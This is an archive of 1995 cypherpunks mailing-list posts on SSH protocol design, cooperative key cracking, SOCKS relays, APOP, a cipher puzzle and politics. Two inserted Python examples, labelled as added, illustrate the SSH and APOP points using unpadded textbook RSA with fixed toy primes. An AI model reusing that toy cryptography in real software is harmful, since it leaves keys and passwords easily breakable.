On Fri, 21 Jul 1995, Lucky Green wrote:

> At 19:15 7/21/95, bigdaddy@ccnet.com wrote:
> Depends on the load on the host, the speed of your link, the speed of your
> Mac, and if you want to trade features for speed at that given moment.
	It's more from the graphical interface than anything else, or has 
been. My Mac is a 25 MHz 040...not that fast these days, but pretty good. 
I simply miss being able to tab through my news.

> The human interface is the whole point behind Newswatcher and Nuntius. As
> for Mac users that prefer tin, they already have an implementation
> available. It is called telnet.
	Unfortunately, with telnet (and yes, I do use this extensively), 
one is hobbled by the fact that the tin program resides on the other side 
of the link. In most cases, the link itself, and the machine it connects 
to, are insecure. This means that one cannot easily use PGP to auto-sign 
messages without keeping the key and a copy of PGP on the remote server.

One can, of course, pre-compose the message, sign/encrypt it, and then 
upload it, but that is a great deal of work compared to simply using TinSign.
It also works against the spontaneous nature of news (for me, at least). 
When was the last time you went to a newsgroup knowing everything you 
would say in advance?

> I have been thinking about writing AppleScripts that link Newswatcher with
> PGP. Unfortunately, there is another project that has precedence. Still, as
> with most great utility software not yet available, you can always try to
> write it yourself.
	I'm in the sixth week of my first programming class...as if that 
means anything. :-) I see your point, 'cypherpunks write code' and all. 
Simply wishing that I could run tin (relatively) securely on my Mac w/out 
needing to install FreeBSD or Linux (which I want to do, anyway).

David Molnar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Sat, 22 Jul 95 07:41:30 PDT
To: stewarts@ix.netcom.com
Subject: Re: Government Mandated Keys
Message-ID: <199507221441.AA32224@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jul 1995 11:39:07 -0700 you wrote:

>At 11:02 AM 7/19/95 PDT, rick hoselton wrote:
>>I want to register the 1-bit key of "1".  I expect to 
>>send about half my message bits encrypted, the rest will be clear-text.
>
>Oh, go ahead, register 0 also.  You'll probably want to switch keys
>occasionally during sessions.

Actually, why don't we just register our favorite geometric constant,
pi?  Assuming it's non-repeating, and non-terminating, you're
guaranteed that whatever key you end up using will be somewhere in pi.
						Dan
******************************************************************************
Vote Speaker Newt Gingrich for President!!                     Dan Bailey
Worcester Polytechnic Institute, class of 1997.                 dan@milliways.org
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Sat, 22 Jul 95 12:22:24 PDT
To: cypherpunks@toad.com
Subject: write some code
Message-ID: <Pine.SUN.3.91.950722121241.25268A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to revive such an old and tired thread, however I found the idea 
quite inspiring and went out and bought a C programming primer that comes W/
a complete tutorial and Borland's turbo C++ Lite compiler.
You people have had a *VERY* profound impact on me and that is what set 
me on this course. I have just written my first program; the mandatory
"Hello world" bit.
Can someone point me in the direction of a mailing list about C programming?
I have been reading the various comp. newsgroups, but I want to join a 
list on the subj. and make some more friends.
Thanks,
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Sat, 22 Jul 95 10:28:13 PDT
To: cypherpunks@toad.com
Subject: Re: Something occured to me
Message-ID: <199507221725.NAA18382@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> On Fri, 21 Jul 1995, Robert A. Hayden wrote:
> 
> > When the republicans took over the congress, they instituted that 
> > Contract on America.   One of the first laws that was passed (by both 
> > parties, I might add) was a law that made lawmakers abide by the same 
> > laws that "normal" people abide by.
> 
> If you believe that...
> 
> Well, it is true, under certain limited circumstances, but it doesn't 
> make them criminally liable for writing bad laws, nor can it.

The pity, of course, is that we can't get Exon for passing around a book
that he said contained child pornography, since he's immune while he's on
the Senate floor.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBE0fyoZzwIn1bdtAQGWwAF/b66+ddWoQ+k7lqOvRu5/2uZgCop5X+d4
ipMc98PXCucBiM5QHP5l6sIopZUVcr5H
=grqV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 22 Jul 95 04:39:26 PDT
To: cypherpunks@toad.com
Subject: Re: Something occured to me
Message-ID: <v01510103ac35c703d666@[193.74.217.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>
>When the republicans took over the congress, they instituted that
>Contract on America.   One of the first laws that was passed (by both
>parties, I might add) was a law that made lawmakers abide by the same
>laws that "normal" people abide by.
>
I think this was aimed at congress's tendency to exempt themselves from
their own legislation.  For example, Congressmen are, supposedly, entitled
to practice hiring discrimination based on, "race, creed, or color of socks"

in the words of GB Trudeau's Lacey Davenport.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBAYFY4k1+54BopBAQHxuwP+J/ypbLg07RE49Mvc/oXTl9RtPwTInEv7
t2RjOb57I2gvjr60i/OS/1EFVQv8FE7iZHtXpOEw7W2nHRTOBsWwTx6L9b7NB5Z9
ufkierYXyJnTJvXXvkrevXZ4wmc26Q5dyMU35HmMensRJSYwlR213DyvvKD5aOG1
6MtCqMomJZQ=
=Wn55
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 22 Jul 95 14:28:31 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: CALLER ID AVOIDANCE
Message-ID: <Pine.SUN.3.91.950722142036.20705B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

While reading the July issue of Soldier of Fortune, I ran across
an ad for yet another telephone anonymity service.  It reads:

			CALL 1-900-CUT TRAX

	Secure your most sensitive calls from all forms of
	caller I.D. and return-call technologies?

	Now make calls from your own telephone safely and
	anonymously.  No need to find a public phone to
	be discreet.

	Trackers never see your number...only ours!  And
	their number will not appear on your phone bill.

	Call any number in the continental US...

	Just $3.95 a minute for safe secure conversations!

	Call 1-900-CUT-TRAX (1-900-288-8729)
	Beacon Telesystems 914-423-3329

Not necessarily as secure as they would have you believe, but
it does demonstrate there is a market for anonymity, I guess.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 22 Jul 95 15:11:03 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
Message-ID: <199507222210.PAA25441@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:12 PM 7/20/95 -0400, Patrick J. LoPresti wrote:
> When it becomes feasible to do what you are asking for Netscape, I am
> sure that someone will do it.  At the moment, it is largely out of our
> hands, since the Netscape interface is totally controlled by Netscape
> Communications...

Netscape for windows, and I presume for Windows NT, supports DDE
and OLE
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 22 Jul 95 13:53:13 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <9507222052.AA28172@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Better yet do it the way Comedy Central wanted to:
	Three strikes you're out and term limits.  You can run for re-election
	but if you lose you get shot.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Sat, 22 Jul 95 14:01:02 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Under Siege II
Message-ID: <Pine.SUN.3.91.950722165444.3785C-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Saw Under Siege II last nite--fairly bad movie--wouldn't recommend it, 
but there was some cpunks/crypto relevance.

*	Mentioned the No Such Agency's SIGINT capabilities via COMMSAT

*	Mentioned encryption several times:
	+	WRT to cell phones
	+	WRT to Newton and encrypting files
	+	WRT to codes--used a CD-ROM to store a keyspace and 
		encrypt and compare

Encryption is going mainstream folks.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 22 Jul 95 17:06:44 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: HOUDINI ON CRYPTO
Message-ID: <Pine.SUN.3.91.950722165907.5294B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I ran across an old book I bought when I was an adolescent.  Like
most boys (I don't know about girls) I went through a phase when
I was interested in magic.  The name of the book was "Houdini on
Magic."

In it, there is a section about Houdini's fascination with
cryptography.  He talks about relatively primitive substitution
ciphers and the like.  One example, though, I thought might be of
interest to Cypherpunks.  He said the following inscription was
written over the Decalogue in a country church.  Apparently, no
one was able to read it for over 200 years.  Can you?:

		PRSRVYPRFCTMNVRKPTHSPRCPTSTN


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluebird@alpha.c2.org
Date: Sat, 22 Jul 95 17:44:00 PDT
To: cypherpunks@toad.com
Subject: Mixmaster for DOS Yet?
Message-ID: <199507230016.RAA03110@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


[Please reply via netmail or Cc: - I have only periodic access to list.]

Is the Mixmaster user software for DOS platforms completed yet?

Thanks for any help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <mazieres@pa.dec.com>
Date: Sat, 22 Jul 95 17:30:45 PDT
To: cypherpunks@toad.com
Subject: Re: Ssh "security hole": proposed fix
Message-ID: <9507230027.AA10524@venus.pa.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, a while ago I suggested the following as a simplified (and
therefore easier to find bugs in) ssh protocol:

> PREAMBLE:
> 
> (1)  A -> B: A
> (2)  B -> A: Cb, PKsb, PKb
> (3)  A -> B: {Kab}_PKsb, {A, B, Cb}_Kab
> (4)  B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab
> 
> SSH_AUTH_RHOSTS:
> 
> (5)  A -> B:  0
> 
> SSH_AUTH_RHOSTS_RSA:
> SSH_AUTH_RSA:
> 
> (5)  A -> B: {{A, B, Cb, Kab}_SKa, PKa}_Kab
> 
> SSH_AUTH_PASSWORD:
> 
> (5)  A -> B: {Ka}_Kab

I was assuming that you would basically have to tolerate
man-in-the-middle style attacks if A did not know PKb before the
exchange.  However, I have since realized that it is easy to have
one's public key in an NFS mounted home directory when talking to a
host one has never talked to before.  Thus, B can know PKa even if A
does not know PKb.  This is enough to prevent man in the middle
attacks if we modify the protocol slightly:

PREAMBLE:

(1)  A -> B: A
(2)  B -> A: Cb, PKsb, PKb
(3)  A -> B: {Kab}_PKsb, {A, B, Cb}_Kab
(4)  B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab

SSH_AUTH_RHOSTS:
SSH_AUTH_PASSWORD:

(5)  A -> B:  0

SSH_AUTH_RHOSTS_RSA:
SSH_AUTH_RSA:

(5)  A -> B: {{A, B, Cb, Kab, PKsb}_SKa, PKa}_Kab
                              ^^^^
IF AUTHENTICATION NOT SUFFICIENT:

(6)  B -> A: {"Passwd:"}_Kab
(7)  A -> B: {Ka}_Kab                           ; Ka is A's password

David
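
The check that the revised message (5) makes possible, as an added example that is not part of the original post: B verifies A's signature over fields rebuilt from B's own state, so a PKsb that A saw but B never sent makes verification fail. The toy textbook-RSA key, the sample values and all function names are assumptions; the relayed case assumes Cb and Kab arrive unchanged on both sides.

```python
import hashlib

# Toy textbook-RSA signature standing in for A's key pair (SKa, PKa).
# Assumption for illustration only: fixed Mersenne primes, no padding.
P, Q, E = 2**127 - 1, 2**89 - 1, 65537
N = P * Q                               # public modulus, part of PKa
D = pow(E, -1, (P - 1) * (Q - 1))       # private exponent, SKa

def encode(fields):
    """Length-prefix each field so field boundaries cannot be shifted."""
    return b"".join(len(f).to_bytes(4, "big") + f for f in fields)

def digest(fields):
    """SHA-256 of the encoded fields, reduced into the toy modulus."""
    return int.from_bytes(hashlib.sha256(encode(fields)).digest(), "big") % N

def sign_with_ska(fields):
    return pow(digest(fields), D, N)

def verify_with_pka(signature, fields):
    return pow(signature, E, N) == digest(fields)

# Constructed sample values (not from the original post).
A, B = b"A.example", b"B.example"
CB = b"cookie-4f1c"
KAB = b"session-key-Kab"
PKSB_OF_B = b"B's real session public key"
PKSB_SUBSTITUTED = b"key substituted by a relay"

def message5_signature(pksb_seen_by_a, bind_pksb):
    """What A signs in step (5): the original fields, plus PKsb in the revision."""
    fields = [A, B, CB, KAB]
    if bind_pksb:
        fields.append(pksb_seen_by_a)
    return sign_with_ska(fields)

def b_accepts(signature, bind_pksb):
    """B rebuilds the fields from its own state; PKsb is the key B itself sent."""
    fields = [A, B, CB, KAB]
    if bind_pksb:
        fields.append(PKSB_OF_B)
    return verify_with_pka(signature, fields)

def outcome(pksb_seen_by_a, bind_pksb):
    """True if B accepts A's step (5) for the PKsb that A was shown."""
    return b_accepts(message5_signature(pksb_seen_by_a, bind_pksb), bind_pksb)

if __name__ == "__main__":
    for label, seen in (("direct", PKSB_OF_B), ("relayed", PKSB_SUBSTITUTED)):
        for bind in (False, True):
            print(f"{label:8} bind_PKsb={bind!s:5} -> B accepts: {outcome(seen, bind)}")
```

Without PKsb in the signed fields, B accepts in both cases and cannot tell them apart; with it, B accepts only when A was shown the key B actually sent.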




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Sat, 22 Jul 95 16:23:42 PDT
To: cypherpunks@toad.com
Subject: RE: Doling out keyspace (was Re: There is no True Key)
Message-ID: <Chameleon.4.01.2.950722182221.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> > - Each helper requests N bits of keyspace.
> > - That chunk is doled out "randomly" by the server.

>Is there any reason why the server should have to dole out the in the
>first place? If a reasonable seed is available, there's no reason each
>helper couldn't just generate a random starting key on its own (with a
>uniform distribution). 

The owner of the key being cracked jumps in and "randomly" selects the part 
of the keyspace containing the key, then reports back in the negative.

This defense of the key is reduced if the server doles out pieces of the 
keyspace randomly, selected only for size, and further reduced if the same 
space is given out multiple times to different requestors. 

Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rfreeman@netaxs.com (Richard Freeman)
Date: Sat, 22 Jul 95 15:54:31 PDT
To: cypherpunks@toad.com
Subject: Re: The OS wars and DOOM...
Message-ID: <199507222254.SAA26768@access.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain



>Given that games usually program close to the hardware, and are 
>therefore the _most_ difficult things to port from one environment
>to another, it really makes one wonder why Excel isn't out for
>(for example) Linux or BSD today.
>

I can think of one good reason for starters:  Microsoft makes Excel.  
Microsoft makes Windoze.  Windoze runs on IBM's and Linux runs X-Windows on 
IBM's.  Microsoft doesn't make Linux which already has a tremendous 
advantage in cost and capability.  Now how many people would pay to upgrade 
to Windoze 95 if there were a true multitasking OS which was free and more 
efficient and capable of operating on more limited systems and with as 
strong a software base?  If I could get Microsoft Office for Linux, I would 
have switched myself.  Unfortunately, I don't have the disk space for both 
DOS and Linux, and I need the commercial grade word-processors, etc...  
There isn't all that much that needs to be added to an OS like Linux to make 
it easy for the general public (perhaps a set of default settings that don't 
require much fiddling by a unix wizard).  Finally, once Microsoft promotes a 
unix-based OS by making software for it, people will start realizing how 
much free stuff there already is for unix, and they will stop buying all 
those nifty utility packages that they buy for DOS/Windoze.  And lastly, 
heaven forbid, people will have access to a windowed OS with command line 
capability!  Now we couldn't have that now, could we?  :)
-----------------------------------------------------------------
Richard T. Freeman <rfreeman@netaxs.com> - finger for pgp key
3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 
http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.net>
Date: Sat, 22 Jul 95 04:47:59 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Netscape the Big Win
In-Reply-To: <199507211727.KAA06527@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.950722185511.3139A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Hal wrote:

> This sounds very good if it already is almost working.  The TCP
> connection which is opened would have to be to a server on the local
> machine, so it would be important that the software support that.  Also,
> the local SOCKS relay would of course not want its winsock calls to be
> intercepted and translated in this way, so there would need to be some
> alternative way to access "vanilla" winsock.  Can you give any
> more information on the NEC work?

I can only quote the original posting to the SOCKS mailing list - I answered 
their call for beta-testers, but I haven't heard back from them, yet:

-------------------------------- 8< ---------------------------------------
>From cornell@syl.dl.nec.com Sat Jul 22 18:50:10 1995
Date: Thu, 20 Jul 1995 10:05:47 -0500 (CDT)
From: Cornell Kinderknecht <cornell@syl.dl.nec.com>
To: socks@syl.dl.nec.com
Cc: Cornell Kinderknecht <cornell@syl.dl.nec.com>
Subject: Good news for Windows/Winsock users

New SOCKS application for PC/Windows/Winsock.  Looking for beta
volunteers...

We've developed an MSWindows .DLL (Windows version 3.1) that allows
unmodified TCP-based Winsock applications and TCP/IP stacks to
communicate through a SOCKS4.2 server.  This will hopefully be
available for general release sometime soon.  Currently, I'm looking
for volunteers to do some beta testing.

If interested, willing to provide feedback, and don't mind rebooting
your PC when it locks up :-), email the following information
about your environment to scbeta-apply@syl.dl.nec.com:

1. Winsock stack type and version (Trumpet, NetManage, etc.).
2. Other network OS/drivers (Netware, IPX, packet drivers, SLIP, etc.).
3. Winsock applications (trumptel, wsftp, netscape, etc.).
4. Your email address.
5. Anything else relevant...

I'll keep the number of beta testers limited and so unfortunately I
might not be able to include everyone who requests.

Oh, BTW, here are some requirements:
1. MS Windows3.1.
2. Installed and operating Winsock TCP/IP stack.
3. Installed and operating SOCKS server (v.4.2).
4. PC running Winsock stack must be able to use DNS to resolve
   names and IP addresses (including its own).

--- Cornell
| Cornell Kinderknecht          Email: cornell@syl.dl.nec.com |
| CSTC                            			      |
| NEC Systems Lab.              Phone: 214-518-3509           |
| Irving, TX (Dallas)             			      |
-------------------------------- 8< ---------------------------------------


[...]
> non-blocking connect as there is in Windows.  Maybe Windows 95 will allow
> a more Unix-style communication model, though.  Should the proxy require
> Windows 95, or will Windows 3 still be in widespread use for another
> year or two?

I'm afraid we'll have to live with async socket calls for a while...

> 
> Also IMO the requirements for the Internet relay are pretty different
> than for the Windows relay.  The Internet relay needs only to be able to
> decrypt/encrypt on the port where the request comes from while sending
> plain data the other way.  It needs a config file so the owner can
> control what kinds of outgoing TCP connections can be done.  The Windows
> one needs to be able to do nested encryption (if chains will be allowed
> eventually), to set up chains, etc.  So for these reasons I am inclined
> to think that the two relays would be separate programs.

Well, a config file would be necessary for the windows one too. For 
example, we could want to socksify only connections to some sites/ports, 
socksify+encrypt some others, and open direct TCP connections to others 
yet, such as servers on the same net (I presume that NEC's DLL will 
attempt to socksify all the connections, so we should de-socksify some of 
them introducing sockd functionality).

> The Windows version would need to decrypt incoming data; you don't want
> that coming in the clear.

Oh yes, I actually meant that it should only be able to issue, and not also
accept, "client hello" requests (as per SSL model).

> 
> I am a little unclear on the certificate situation.  As we saw with the
> PGP key servers before RSAREF PGP existed, RSA put pressure on these
> public sites which they saw as contributing to the use of infringing
> software.  Similarly having a certificate created by infringing software
> might be seen as illegal, even if RSAREF was actually used for the
> handshaking in the protocol.  Server operators are quite vulnerable to
> threatening letters from RSA.

RSA patents (I mean RSA, not RSADSI's) are only valid in USA. If I set up 
a certifying authority, say, here in Hong Kong, using EAY's code written in 
Australia, how could RSADSI complain? Server operators would import 
data created under perfectly legal conditions.

> Another problem with RSAREF is that it does not allow you to exchange a
> session key using RSA encryption in a straightforward manner.  The entry
> points you have legal access to choose a random session key, PK encrypt
> it, send it, and then encrypt the message using that session key with DES
> or 3DES.  However I notice that SSLREF calls undocumented entry points
> like RSAPrivateDecrypt and RSAPublicEncrypt.  I am not sure how they are
> able to do this.  Maybe they got special permission from RSA.  I don't
> know whether the SSLEAY library would be able to do this without such
> special arrangements.

That should be investigated. Is RSAREF's licence only valid for some 
entry points? In any case, I suppose that SSLREF may be used with any 
certificate, unlike Netscape (am I wrong?).

> One other problem is the risk taken by people running the relay servers
> on the net.  These could be used to launder connections by hacker /
> cracker types.  So probably only a limited set of outgoing ports would be
> permitted, say, 80 and 1080 which are the most common http ports.  This
> would restrict the utility of the SOCKS approach for other uses like
> secure telnet, unfortunately.

Well, the same problem exists for illegal uses of the present remailers, 
but hasn't stopped their operators.

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sat, 22 Jul 95 20:30:10 PDT
To: Sandy Sandfort <cypherpunks@toad.com>
Subject: Re: HOUDINI ON CRYPTO
Message-ID: <9507230331.AA27567@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Sandy Sandfort 

. . . there is a section about Houdini's fascination with
cryptography.  He talks about relatively primitive substitution
ciphers and the like.  One example, though, I thought might be of
interest to Cypherpunks.  He said the following inscription was
written over the Decalogue in a country church.  Apparently, no
one was able to read it for over 200 years.  Can you?:

		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
....................................

It looks to be something like this to me:

PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN


  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 22 Jul 95 11:51:27 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <v01510100ac36cb54a1d2@[193.74.217.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>Post Office Protocol 3 (POP3) has an optional command called
>APOP which sends a string of the form "<process-ID.clock@hostname>".
>The POP3 client calculates the MD5 digest of
>
>  <process-ID.clock@hostname>password
>
>and sends it to the server as "APOP username 58349485whatever89583449".
>
>I like it.
>

Of course, this requires the user password to be stored unencrypted on the
server; which you may not want to do.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.
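
The storage trade-off raised in this message, as an added example that is not part of the original post: a server can recompute the APOP digest only from the cleartext secret, so an account stored as a salted hash can still check a cleartext login but cannot take part in APOP. The `MailServer` class, its method names, the PBKDF2 storage format and the sample accounts are assumptions; a counter stands in for the clock in the challenge string.

```python
import hashlib
import hmac
import os

class ApopUnavailable(Exception):
    """The stored credential cannot be used to recompute an APOP digest."""

def apop_digest(challenge, password):
    # MD5 over the challenge string immediately followed by the shared secret.
    return hashlib.md5((challenge + password).encode("utf-8")).hexdigest()

class MailServer:
    """Hypothetical server holding two kinds of credential records."""
    ITERATIONS = 100_000

    def __init__(self, hostname):
        self.hostname = hostname
        self.users = {}
        self.counter = 0

    def add_plaintext_user(self, user, password):
        self.users[user] = ("plain", password)

    def add_hashed_user(self, user, password):
        salt = os.urandom(16)
        stored = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.ITERATIONS)
        self.users[user] = ("hashed", salt, stored)

    def new_challenge(self):
        # <process-ID.clock@hostname>, different for every connection.
        self.counter += 1
        return f"<{os.getpid()}.{self.counter}@{self.hostname}>"

    def verify_cleartext(self, user, password):
        """Cleartext login works with either record type."""
        record = self.users.get(user)
        if record is None:
            return False
        if record[0] == "plain":
            return hmac.compare_digest(record[1].encode(), password.encode())
        _, salt, stored = record
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.ITERATIONS)
        return hmac.compare_digest(stored, candidate)

    def verify_apop(self, user, challenge, digest):
        """APOP needs the cleartext secret to rebuild MD5(challenge + password)."""
        record = self.users.get(user)
        if record is None:
            return False
        if record[0] != "plain":
            raise ApopUnavailable(f"{user}: only a salted hash is stored")
        expected = apop_digest(challenge, record[1])
        return hmac.compare_digest(expected.encode(), digest.encode())

if __name__ == "__main__":
    server = MailServer("mail.example.test")          # constructed sample data
    server.add_plaintext_user("alice", "correct horse")
    server.add_hashed_user("bob", "hunter2")
    challenge = server.new_challenge()
    print(server.verify_apop("alice", challenge, apop_digest(challenge, "correct horse")))
    try:
        server.verify_apop("bob", challenge, apop_digest(challenge, "hunter2"))
    except ApopUnavailable as exc:
        print("APOP refused:", exc)
```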






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 22 Jul 95 21:14:11 PDT
To: blancw@accessone.com
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <9507230331.AA27567@accessone.com>
Message-ID: <Pine.SUN.3.91.950722211102.12499B-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Blanc wrote:

>> 		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
> ....................................
> 
> It looks to be something like this to me:
> 
> PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN

Close, very close.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Sat, 22 Jul 95 20:45:59 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <v02130504ac375fb78fb1@[166.84.254.3]>
Message-ID: <Pine.3.89.9507222116.A338-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Jul 1995, Robert A. Rosenberg wrote:

> At 04:00 7/22/95, Craig Hubley wrote:
> >>
> >> About two weeks ago, there was some talk in here with regards to holding
> >> DC lawmakers criminally liable for passing bad laws.  This was followed
> >> up with postings pointing out that you can't do that.
> >
> >Here's something you *can* do:
> >
> >"Three strikes you're out" for politicians.
> >
> >Any time the Supreme Court strikes down a law, any politician who has been
> >found to have voted in favor of three such laws is immediately stripped of
> >all offices and rendered ineligible to run for public office ever again,
> >at any level.  (The same might apply to those found to have lied to a court
> >
> >A politician who would trade citizen rights for political gain must be denied
> >the benefits of such a tradeoff.  This might prevent the rise of demagogues.
> >Term limits, etc., would of course help as well.  It would also give those
> >politicians who vote for 'motherhood' issues like 'protecting kids from the
> >perverts on the Internet' a good reason to think twice about the real issue.
> >If they REALLY believe they are protecting someone, they will still vote in
> >favor.  If they are going with the flow to avoid criticism, they'll lose in
> >the end.
> >
> >My reasoning is that any politician whose laws are consistently struck down
> >should be deemed to lack a fundamental understanding of the rights of the
> >citizens of his/her country or jurisdiction.  They are thus a poor guardian
> >of those rights.
> >
> >You heard it here first.
> >
> >Craig Hubley
> 
> 
> I'd love to see the system described in H. Beam Piper's "A Planet for
> Texans" implemented. Under that system, all Politicians are BY LAW
> representing the interests of ALL their constituents. Any constituent who
> feels that he/she is not being adequately represented (or feels that
> his/her views/interests are being misrepresented) is by law granted total
> access to the Politician and may register this disapproval of the
> Politician's Performance in any way up to and including killing the
> Politician. If the Politician (or his/her survivors/friends <g>) feel that
> the constituent used excessive force (such as using a car bomb or a long
> distance weapon like a rifle as opposed to using a personal weapon such as
> a hand gun at close range) or force out-of-proportion to the action being
> protested, they can bring charges in the "Court of Political Justice". In
> such a trial it is the job of the prosecution (ie: The Politician or
> Representatives) to prove that the constituent did, in fact, overstep the
> accepted rules for registering disapproval.

Reminds me of the old Heinlein advice about supplying forceful 
punctuation after the word "but" in: "Of course, it's none of my 
business, but...".  RAH advises against using excessive force - cutting 
the offender's throat is only a momentary pleasure and is bound to get 
you talked about ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

